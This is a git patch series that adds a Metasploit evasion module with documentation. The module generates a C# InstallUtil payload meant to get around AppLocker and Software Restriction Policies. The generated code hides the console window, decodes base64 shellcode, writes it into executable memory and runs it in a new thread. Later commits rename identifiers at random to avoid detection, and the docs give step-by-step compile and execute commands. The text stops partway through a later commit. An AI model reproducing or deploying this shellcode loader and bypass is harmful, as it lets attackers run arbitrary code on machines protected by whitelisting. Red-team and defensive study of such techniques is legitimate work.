From 487714b98e3ec8c08c57a86caa446ec3984dc6fd Mon Sep 17 00:00:00 2001 From: Mike Menasi Date: Mon, 29 Apr 2019 21:34:56 +0100 Subject: [PATCH 01/18] add new evasion module applocker_evasion_install_util --- .../windows/applocker_evasion_install_util.md | 9 ++ .../windows/applocker_evasion_install_util.rb | 112 ++++++++++++++++++ 2 files changed, 121 insertions(+) create mode 100644 documentation/modules/evasion/windows/applocker_evasion_install_util.md create mode 100644 modules/evasion/windows/applocker_evasion_install_util.rb diff --git a/documentation/modules/evasion/windows/applocker_evasion_install_util.md b/documentation/modules/evasion/windows/applocker_evasion_install_util.md new file mode 100644 index 000000000000..44591a0bb3ec --- /dev/null +++ b/documentation/modules/evasion/windows/applocker_evasion_install_util.md @@ -0,0 +1,9 @@ +## Intro + +This module is designed to evade solutions such as software restriction policies and Applocker. +The main vector for this bypass is to use the trusted binary Install_Util.exe in executing user supplied code. + +## Vulnerable Application + +This evasion will work on all versions of Windows that include .net versions 3.5 or greater (note: ensure the selected payload matches the target os architecture). + diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb new file mode 100644 index 000000000000..32c959084d62 --- /dev/null +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -0,0 +1,112 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Evasion + + def initialize(info={}) + super(merge_info(info, + 'Name' => 'applocker_evasion_install_util', + 'Description' => %q{ + This module will assist you in evading Microsoft Windows Applocker and Software Restriction Policies. + This technique utilises the Microsoft signed binary InstallUtil.exe to execute user supplied code. + }, + 'Author' => + [ + 'Nick Tyrer <@NickTyrer>', # For Module + 'Casey Smith', # install_util bypass research + ], + 'License' => MSF_LICENSE, + 'Platform' => 'win', + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'Targets' => [ ['Microsoft Windows', {}] ] + )) + + register_options([ + OptString.new('FILENAME', [true, 'Filename for the evasive file (default: install_util.txt)', 'install_util.txt']) + ]) + end + + + def build_payload + esc = Rex::Text.encode_base64(payload.encoded) + end + + + def instructions + <<~HEREDOC + ___________________________________________________________________________________________________________________________________________ + | | + | Instructions | + |___________________________________________________________________________________________________________________________________________| + | | + | 1.Copy the entire contents of #{datastore['FILENAME']} to the target and execute: | + | 2.x86{ | + | Compile using: C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\csc.exe /out:installutil.exe #{datastore['FILENAME']} | + | Execute using: C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe | + | } | + | x64{ | + | Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\csc.exe /out:installutil.exe #{datastore['FILENAME']} | + | Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe | + | } | + |___________________________________________________________________________________________________________________________________________| + HEREDOC + end + + + def install_util + esc = build_payload + test = Rex::Text.rand_text_alphanumeric (8) + <<~HEREDOC + /* + #{instructions} + */ + using System; + namespace #{Rex::Text.rand_text_alpha 8} + { + public class #{Rex::Text.rand_text_alphanumeric 8} { public static void Main() { } } + [System.ComponentModel.RunInstaller(true)] + public class #{Rex::Text.rand_text_alphanumeric 8} : System.Configuration.Install.Installer + { + private static Int32 MEM_COMMIT=0x1000; + private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; + private static UInt32 INFINITE = 0xFFFFFFFF; + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p); + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id); + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms); + [System.Runtime.InteropServices.DllImport("user32.dll")] + static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); + [System.Runtime.InteropServices.DllImport("Kernel32")] + private static extern IntPtr GetConsoleWindow(); + const int SW_HIDE = 0; + const int SW_SHOW = 5; + public override void Uninstall(System.Collections.IDictionary s) + { + IntPtr hwnd; + hwnd = GetConsoleWindow(); + ShowWindow(hwnd, SW_HIDE); + string #{test} = "#{esc}"; + byte[] newBytes = Convert.FromBase64String(#{test}); + byte[] sc = newBytes; + IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length); + IntPtr id = IntPtr.Zero; + WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE); + } + } + } + HEREDOC + end + + + def run + file_create(install_util) + print_status("#{instructions}") + end + +end + From ee7ef7ad4e9033db3f2c555499f239b1452d9ee4 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Mon, 29 Apr 2019 22:23:49 +0100 Subject: [PATCH 02/18] fix typo --- .../modules/evasion/windows/applocker_evasion_install_util.md | 2 +- modules/evasion/windows/applocker_evasion_install_util.rb | 1 + 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/documentation/modules/evasion/windows/applocker_evasion_install_util.md b/documentation/modules/evasion/windows/applocker_evasion_install_util.md index 44591a0bb3ec..81e96b0eba1a 100644 --- a/documentation/modules/evasion/windows/applocker_evasion_install_util.md +++ b/documentation/modules/evasion/windows/applocker_evasion_install_util.md @@ -1,7 +1,7 @@ ## Intro This module is designed to evade solutions such as software restriction policies and Applocker. -The main vector for this bypass is to use the trusted binary Install_Util.exe in executing user supplied code. +The main vector for this bypass is to use the trusted binary InstallUtil.exe in executing user supplied code. ## Vulnerable Application diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index 32c959084d62..07f99dd381d6 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -36,6 +36,7 @@ def build_payload def instructions <<~HEREDOC + ___________________________________________________________________________________________________________________________________________ | | | Instructions | From 38256a18bd6bbe027e95614196586e8cb04c210c Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Wed, 1 May 2019 17:05:40 +0100 Subject: [PATCH 03/18] added further obfuscation to module --- .../windows/applocker_evasion_install_util.rb | 41 +++++++++++-------- 1 file changed, 23 insertions(+), 18 deletions(-) diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index 07f99dd381d6..87b20d9fefe5 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -14,7 +14,7 @@ def initialize(info={}) }, 'Author' => [ - 'Nick Tyrer <@NickTyrer>', # For Module + 'Nick Tyrer <@NickTyrer>', # for module development 'Casey Smith', # install_util bypass research ], 'License' => MSF_LICENSE, @@ -58,17 +58,23 @@ def instructions def install_util esc = build_payload - test = Rex::Text.rand_text_alphanumeric (8) + moda = Rex::Text.rand_text_alpha (3) + modb = Rex::Text.rand_text_alpha (3) + modc = Rex::Text.rand_text_alpha (3) + modd = Rex::Text.rand_text_alpha (3) + mode = Rex::Text.rand_text_alpha (3) + modf = Rex::Text.rand_text_alpha (3) + modg = Rex::Text.rand_text_alpha (3) <<~HEREDOC /* #{instructions} */ using System; - namespace #{Rex::Text.rand_text_alpha 8} + namespace #{Rex::Text.rand_text_alpha 3} { - public class #{Rex::Text.rand_text_alphanumeric 8} { public static void Main() { } } + public class #{Rex::Text.rand_text_alphanumeric 3} { public static void Main() { } } [System.ComponentModel.RunInstaller(true)] - public class #{Rex::Text.rand_text_alphanumeric 8} : System.Configuration.Install.Installer + public class #{Rex::Text.rand_text_alphanumeric 3} : System.Configuration.Install.Installer { private static Int32 MEM_COMMIT=0x1000; private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; @@ -80,23 +86,22 @@ def install_util [System.Runtime.InteropServices.DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms); [System.Runtime.InteropServices.DllImport("user32.dll")] - static extern bool ShowWindow(IntPtr hWnd, int nCmdShow); + static extern bool ShowWindow(IntPtr #{modg}, int nCmdShow); [System.Runtime.InteropServices.DllImport("Kernel32")] private static extern IntPtr GetConsoleWindow(); - const int SW_HIDE = 0; - const int SW_SHOW = 5; + const int #{modf} = 0; public override void Uninstall(System.Collections.IDictionary s) { - IntPtr hwnd; - hwnd = GetConsoleWindow(); - ShowWindow(hwnd, SW_HIDE); - string #{test} = "#{esc}"; - byte[] newBytes = Convert.FromBase64String(#{test}); - byte[] sc = newBytes; - IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); - System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length); - IntPtr id = IntPtr.Zero; - WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE); + IntPtr #{modg}; + #{modg} = GetConsoleWindow(); + ShowWindow(#{modg}, #{modf}); + string #{moda} = "#{esc}"; + byte[] #{modb} = Convert.FromBase64String(#{moda}); + byte[] #{modc} = #{modb}; + IntPtr #{modd} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{modc}.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + System.Runtime.InteropServices.Marshal.Copy(#{modc}, 0, #{modd}, #{modc}.Length); + IntPtr #{mode} = IntPtr.Zero; + WaitForSingleObject(CreateThread(#{mode}, UIntPtr.Zero, #{modd}, #{mode}, 0, ref #{mode}), INFINITE); } } } From f023fb95253655a2665aa8e715e1518663a9f0d9 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Thu, 2 May 2019 08:39:35 +0100 Subject: [PATCH 04/18] add further obfuscation --- .../windows/applocker_evasion_install_util.rb | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-) diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index 87b20d9fefe5..dfb1bc2fa876 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -65,6 +65,9 @@ def install_util mode = Rex::Text.rand_text_alpha (3) modf = Rex::Text.rand_text_alpha (3) modg = Rex::Text.rand_text_alpha (3) + modh = Rex::Text.rand_text_alpha (3) + modi = Rex::Text.rand_text_alpha (3) + modj = Rex::Text.rand_text_alpha (3) <<~HEREDOC /* #{instructions} @@ -72,13 +75,13 @@ def install_util using System; namespace #{Rex::Text.rand_text_alpha 3} { - public class #{Rex::Text.rand_text_alphanumeric 3} { public static void Main() { } } + public class #{Rex::Text.rand_text_alpha 3} { public static void Main() { } } [System.ComponentModel.RunInstaller(true)] - public class #{Rex::Text.rand_text_alphanumeric 3} : System.Configuration.Install.Installer + public class #{Rex::Text.rand_text_alpha 3} : System.Configuration.Install.Installer { - private static Int32 MEM_COMMIT=0x1000; - private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; - private static UInt32 INFINITE = 0xFFFFFFFF; + private static Int32 #{modh}=0x1000; + private static IntPtr #{modi}=(IntPtr)0x40; + private static UInt32 #{modj} = 0xFFFFFFFF; [System.Runtime.InteropServices.DllImport("kernel32")] private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p); [System.Runtime.InteropServices.DllImport("kernel32")] @@ -98,10 +101,10 @@ def install_util string #{moda} = "#{esc}"; byte[] #{modb} = Convert.FromBase64String(#{moda}); byte[] #{modc} = #{modb}; - IntPtr #{modd} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{modc}.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + IntPtr #{modd} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{modc}.Length, #{modh}, #{modi}); System.Runtime.InteropServices.Marshal.Copy(#{modc}, 0, #{modd}, #{modc}.Length); IntPtr #{mode} = IntPtr.Zero; - WaitForSingleObject(CreateThread(#{mode}, UIntPtr.Zero, #{modd}, #{mode}, 0, ref #{mode}), INFINITE); + WaitForSingleObject(CreateThread(#{mode}, UIntPtr.Zero, #{modd}, #{mode}, 0, ref #{mode}), #{modj}); } } } From 9a6d56a8dee1d8315c621f1a8ad0f3fb623e5d32 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Thu, 23 May 2019 20:29:11 +0100 Subject: [PATCH 05/18] fix typo --- modules/evasion/windows/applocker_evasion_install_util.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index dfb1bc2fa876..e3ce23604332 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -15,7 +15,7 @@ def initialize(info={}) 'Author' => [ 'Nick Tyrer <@NickTyrer>', # for module development - 'Casey Smith', # install_util bypass research + 'Casey Smith', # for install_util bypass research ], 'License' => MSF_LICENSE, 'Platform' => 'win', @@ -42,7 +42,7 @@ def instructions | Instructions | |___________________________________________________________________________________________________________________________________________| | | - | 1.Copy the entire contents of #{datastore['FILENAME']} to the target and execute: | + | 1.Copy #{datastore['FILENAME']} to the target and execute: | | 2.x86{ | | Compile using: C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\csc.exe /out:installutil.exe #{datastore['FILENAME']} | | Execute using: C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe | From f6eeb7b4b1b767ab00dc901a57e037f48b9246f4 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Thu, 23 May 2019 20:35:29 +0100 Subject: [PATCH 06/18] fix typo --- modules/evasion/windows/applocker_evasion_install_util.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index e3ce23604332..d9e9275fb4e9 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -14,8 +14,8 @@ def initialize(info={}) }, 'Author' => [ - 'Nick Tyrer <@NickTyrer>', # for module development - 'Casey Smith', # for install_util bypass research + 'Nick Tyrer <@NickTyrer>', # module development + 'Casey Smith', # install_util bypass research ], 'License' => MSF_LICENSE, 'Platform' => 'win', From b7221a65a11d0b2f7382722b135ced0197a13d1b Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Sun, 26 May 2019 22:18:43 +0100 Subject: [PATCH 07/18] addressed issues raised by @cbrnrd --- .../windows/applocker_evasion_install_util.rb | 50 +++++++------------ 1 file changed, 17 insertions(+), 33 deletions(-) diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index d9e9275fb4e9..ce1a7be2049f 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -7,7 +7,7 @@ class MetasploitModule < Msf::Evasion def initialize(info={}) super(merge_info(info, - 'Name' => 'applocker_evasion_install_util', + 'Name' => 'Applocker Evasion .NET Framework Installation Utility', 'Description' => %q{ This module will assist you in evading Microsoft Windows Applocker and Software Restriction Policies. This technique utilises the Microsoft signed binary InstallUtil.exe to execute user supplied code. @@ -20,7 +20,8 @@ def initialize(info={}) 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => [ ARCH_X86, ARCH_X64 ], - 'Targets' => [ ['Microsoft Windows', {}] ] + 'Targets' => [ ['Microsoft Windows', {}] ], + 'References' => [ ['URL', 'https://attack.mitre.org/techniques/T1118/'] ] )) register_options([ @@ -35,43 +36,26 @@ def build_payload def instructions - <<~HEREDOC + if payload.arch.first == ARCH_X86 + print_status "Copy #{datastore['FILENAME']} to the target" + print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\csc.exe /out:installutil.exe #{datastore['FILENAME']}" + print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe" + else + print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\csc.exe /out:installutil.exe #{datastore['FILENAME']}" + print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe" + end + end - ___________________________________________________________________________________________________________________________________________ - | | - | Instructions | - |___________________________________________________________________________________________________________________________________________| - | | - | 1.Copy #{datastore['FILENAME']} to the target and execute: | - | 2.x86{ | - | Compile using: C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\csc.exe /out:installutil.exe #{datastore['FILENAME']} | - | Execute using: C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe | - | } | - | x64{ | - | Compile using: C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\csc.exe /out:installutil.exe #{datastore['FILENAME']} | - | Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe | - | } | - |___________________________________________________________________________________________________________________________________________| - HEREDOC + + def mod(var) + var = Rex::Text.rand_text_alpha (3) end def install_util esc = build_payload - moda = Rex::Text.rand_text_alpha (3) - modb = Rex::Text.rand_text_alpha (3) - modc = Rex::Text.rand_text_alpha (3) - modd = Rex::Text.rand_text_alpha (3) - mode = Rex::Text.rand_text_alpha (3) - modf = Rex::Text.rand_text_alpha (3) - modg = Rex::Text.rand_text_alpha (3) - modh = Rex::Text.rand_text_alpha (3) - modi = Rex::Text.rand_text_alpha (3) - modj = Rex::Text.rand_text_alpha (3) + moda, modb, modc, modd, mode, modf, modg, mode, modf, modg, modh, modi, modj = mod(moda), mod(modb), mod(modc), mod(modd), mod(mode), mod(modf), mod(modg), mod(modh), mod(modi), mod(modj) <<~HEREDOC - /* - #{instructions} - */ using System; namespace #{Rex::Text.rand_text_alpha 3} { @@ -114,7 +98,7 @@ def install_util def run file_create(install_util) - print_status("#{instructions}") + instructions end end From ab20c24340280b44b6fe56e35567a3e4e0498fbd Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Mon, 27 May 2019 16:34:53 +0100 Subject: [PATCH 08/18] fix setting mod variables --- modules/evasion/windows/applocker_evasion_install_util.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index ce1a7be2049f..2d876273e199 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -7,7 +7,7 @@ class MetasploitModule < Msf::Evasion def initialize(info={}) super(merge_info(info, - 'Name' => 'Applocker Evasion .NET Framework Installation Utility', + 'Name' => 'Applocker Evasion - .NET Framework Installation Utility', 'Description' => %q{ This module will assist you in evading Microsoft Windows Applocker and Software Restriction Policies. This technique utilises the Microsoft signed binary InstallUtil.exe to execute user supplied code. @@ -54,7 +54,7 @@ def mod(var) def install_util esc = build_payload - moda, modb, modc, modd, mode, modf, modg, mode, modf, modg, modh, modi, modj = mod(moda), mod(modb), mod(modc), mod(modd), mod(mode), mod(modf), mod(modg), mod(modh), mod(modi), mod(modj) + moda, modb, modc, modd, mode, modf, modg, modh, modi, modj = mod(moda), mod(modb), mod(modc), mod(modd), mod(mode), mod(modf), mod(modg), mod(modh), mod(modi), mod(modj) <<~HEREDOC using System; namespace #{Rex::Text.rand_text_alpha 3} @@ -102,4 +102,3 @@ def run end end - From 894d817fd16167305827fe008204527d3ae3e5d0 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Mon, 27 May 2019 16:58:16 +0100 Subject: [PATCH 09/18] updated instructions function --- modules/evasion/windows/applocker_evasion_install_util.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index 2d876273e199..31d52e06ead4 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -36,8 +36,8 @@ def build_payload def instructions + print_status "Copy #{datastore['FILENAME']} to the target" if payload.arch.first == ARCH_X86 - print_status "Copy #{datastore['FILENAME']} to the target" print_status "Compile using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\csc.exe /out:installutil.exe #{datastore['FILENAME']}" print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe" else From 73f234a48a5565a11e61d8cbff8d81e0fdf69fe9 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Mon, 27 May 2019 17:55:58 +0100 Subject: [PATCH 10/18] address documentation issues raised by @cbrnrd --- .../windows/applocker_evasion_install_util.md | 27 ++++++++++++++++--- 1 file changed, 24 insertions(+), 3 deletions(-) diff --git a/documentation/modules/evasion/windows/applocker_evasion_install_util.md b/documentation/modules/evasion/windows/applocker_evasion_install_util.md index 81e96b0eba1a..a6515f9e06c9 100644 --- a/documentation/modules/evasion/windows/applocker_evasion_install_util.md +++ b/documentation/modules/evasion/windows/applocker_evasion_install_util.md @@ -1,9 +1,30 @@ ## Intro -This module is designed to evade solutions such as software restriction policies and Applocker. -The main vector for this bypass is to use the trusted binary InstallUtil.exe in executing user supplied code. +This module is designed to evade solutions such as software restriction policies and Applocker. +Applocker in its default configuration will block code in the form of executables (.exe and .com, .msi), scripts (.ps1, .vbs, .js) and dll's from running in user controlled directories. +It enforces this by employing whitelisting, in that code can only be run from the protected directories and sub directories of "Program Files" and "Windows" +The main vector for this bypass is to use the trusted binary InstallUtil.exe which is located within the trusted Windows directory and also has the ability to execute user supplied code. ## Vulnerable Application -This evasion will work on all versions of Windows that include .net versions 3.5 or greater (note: ensure the selected payload matches the target os architecture). +This evasion will work on all versions of Windows that include .NET versions 3.5 or greater that has solutions such as Applocker or Software Restriction Policies active. +## Options + +- **FILENAME** - Filename for the evasive file (default: install_util.txt). + +## Verification Steps + + 1. Start `msfconsole` + 2. Do: `use evasion/windows/applocker_evasion_install_util` + 3. Do: `set PAYLOAD ` + 4. Do: `run` + 5. The module will now display instructions of how to proceed: + `[+] install_util.txt stored at /root/.msf4/local/install_util.txt` + `[*] Copy install_util.txt to the target` + `[*] Compile using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\csc.exe /out:installutil.exe install_util.txt` - replace [.NET Version] with the version directory present on the target (typically "v4.0.30319"). + `[*] Execute using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe` replace [.NET Version] with the version directory present on the target (typically "v4.0.30319"). + +## References + +https://attack.mitre.org/techniques/T1118/ From 4487ae7ad3ef0b94239efefaa56641a839ab9332 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Mon, 27 May 2019 18:01:40 +0100 Subject: [PATCH 11/18] fix formatting --- .../evasion/windows/applocker_evasion_install_util.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/documentation/modules/evasion/windows/applocker_evasion_install_util.md b/documentation/modules/evasion/windows/applocker_evasion_install_util.md index a6515f9e06c9..bea67a7a3541 100644 --- a/documentation/modules/evasion/windows/applocker_evasion_install_util.md +++ b/documentation/modules/evasion/windows/applocker_evasion_install_util.md @@ -20,10 +20,10 @@ This evasion will work on all versions of Windows that include .NET versions 3.5 3. Do: `set PAYLOAD ` 4. Do: `run` 5. The module will now display instructions of how to proceed: - `[+] install_util.txt stored at /root/.msf4/local/install_util.txt` - `[*] Copy install_util.txt to the target` - `[*] Compile using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\csc.exe /out:installutil.exe install_util.txt` - replace [.NET Version] with the version directory present on the target (typically "v4.0.30319"). - `[*] Execute using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe` replace [.NET Version] with the version directory present on the target (typically "v4.0.30319"). + -`[+] install_util.txt stored at /root/.msf4/local/install_util.txt` + -`[*] Copy install_util.txt to the target` + -`[*] Compile using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\csc.exe /out:installutil.exe install_util.txt` - replace [.NET Version] with the version directory present on the target (typically "v4.0.30319"). + -`[*] Execute using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe` replace [.NET Version] with the version directory present on the target (typically "v4.0.30319"). ## References From a3b22cbec42e2f7fa7783255ca29ae7e3bba7341 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Mon, 27 May 2019 18:04:24 +0100 Subject: [PATCH 12/18] fix formatting --- .../evasion/windows/applocker_evasion_install_util.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/documentation/modules/evasion/windows/applocker_evasion_install_util.md b/documentation/modules/evasion/windows/applocker_evasion_install_util.md index bea67a7a3541..9c922f9808ae 100644 --- a/documentation/modules/evasion/windows/applocker_evasion_install_util.md +++ b/documentation/modules/evasion/windows/applocker_evasion_install_util.md @@ -19,11 +19,11 @@ This evasion will work on all versions of Windows that include .NET versions 3.5 2. Do: `use evasion/windows/applocker_evasion_install_util` 3. Do: `set PAYLOAD ` 4. Do: `run` - 5. The module will now display instructions of how to proceed: - -`[+] install_util.txt stored at /root/.msf4/local/install_util.txt` - -`[*] Copy install_util.txt to the target` - -`[*] Compile using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\csc.exe /out:installutil.exe install_util.txt` - replace [.NET Version] with the version directory present on the target (typically "v4.0.30319"). - -`[*] Execute using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe` replace [.NET Version] with the version directory present on the target (typically "v4.0.30319"). + 5. The module will now display instructions of how to proceed + 6. `[+] install_util.txt stored at /root/.msf4/local/install_util.txt` + 7. `[*] Copy install_util.txt to the target` + 8. `[*] Compile using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\csc.exe /out:installutil.exe install_util.txt` replace [.NET Version] with the version directory present on the target (typically "v4.0.30319"). + 9. `[*] Execute using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\InstallUtil.exe /logfile= /LogToConsole=false /U installutil.exe` replace [.NET Version] with the version directory present on the target (typically "v4.0.30319"). ## References From 4a359f5f5e358c4fa683b87d5df8e4e842ddcc79 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Mon, 27 May 2019 21:19:10 +0100 Subject: [PATCH 13/18] format --- modules/evasion/windows/applocker_evasion_install_util.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index 31d52e06ead4..e2adc3da3e12 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -15,7 +15,7 @@ def initialize(info={}) 'Author' => [ 'Nick Tyrer <@NickTyrer>', # module development - 'Casey Smith', # install_util bypass research + 'Casey Smith', # install_util bypass research ], 'License' => MSF_LICENSE, 'Platform' => 'win', From 45db30bd909e31341ca36680b95b6483202a9646 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Fri, 7 Jun 2019 15:02:47 +0100 Subject: [PATCH 14/18] increase randomness to avoid duplicates --- modules/evasion/windows/applocker_evasion_install_util.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index e2adc3da3e12..91949ee821e5 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -48,7 +48,7 @@ def instructions def mod(var) - var = Rex::Text.rand_text_alpha (3) + var = Rex::Text.rand_text_alpha (8) end From 46ebae823134904098b0d389e9b60f91525e9d11 Mon Sep 17 00:00:00 2001 From: NickTyrer Date: Sat, 15 Jun 2019 11:06:38 +0100 Subject: [PATCH 15/18] implemented rubocop suggestions --- .../windows/applocker_evasion_install_util.rb | 137 +++++++++--------- 1 file changed, 69 insertions(+), 68 deletions(-) diff --git a/modules/evasion/windows/applocker_evasion_install_util.rb b/modules/evasion/windows/applocker_evasion_install_util.rb index 91949ee821e5..7e0eda285161 100644 --- a/modules/evasion/windows/applocker_evasion_install_util.rb +++ b/modules/evasion/windows/applocker_evasion_install_util.rb @@ -6,99 +6,100 @@ class MetasploitModule < Msf::Evasion def initialize(info={}) - super(merge_info(info, - 'Name' => 'Applocker Evasion - .NET Framework Installation Utility', - 'Description' => %q{ - This module will assist you in evading Microsoft Windows Applocker and Software Restriction Policies. - This technique utilises the Microsoft signed binary InstallUtil.exe to execute user supplied code. - }, - 'Author' => - [ - 'Nick Tyrer <@NickTyrer>', # module development - 'Casey Smith', # install_util bypass research - ], - 'License' => MSF_LICENSE, - 'Platform' => 'win', - 'Arch' => [ ARCH_X86, ARCH_X64 ], - 'Targets' => [ ['Microsoft Windows', {}] ], - 'References' => [ ['URL', 'https://attack.mitre.org/techniques/T1118/'] ] - )) + super( + update_info( + info, + 'Name' => 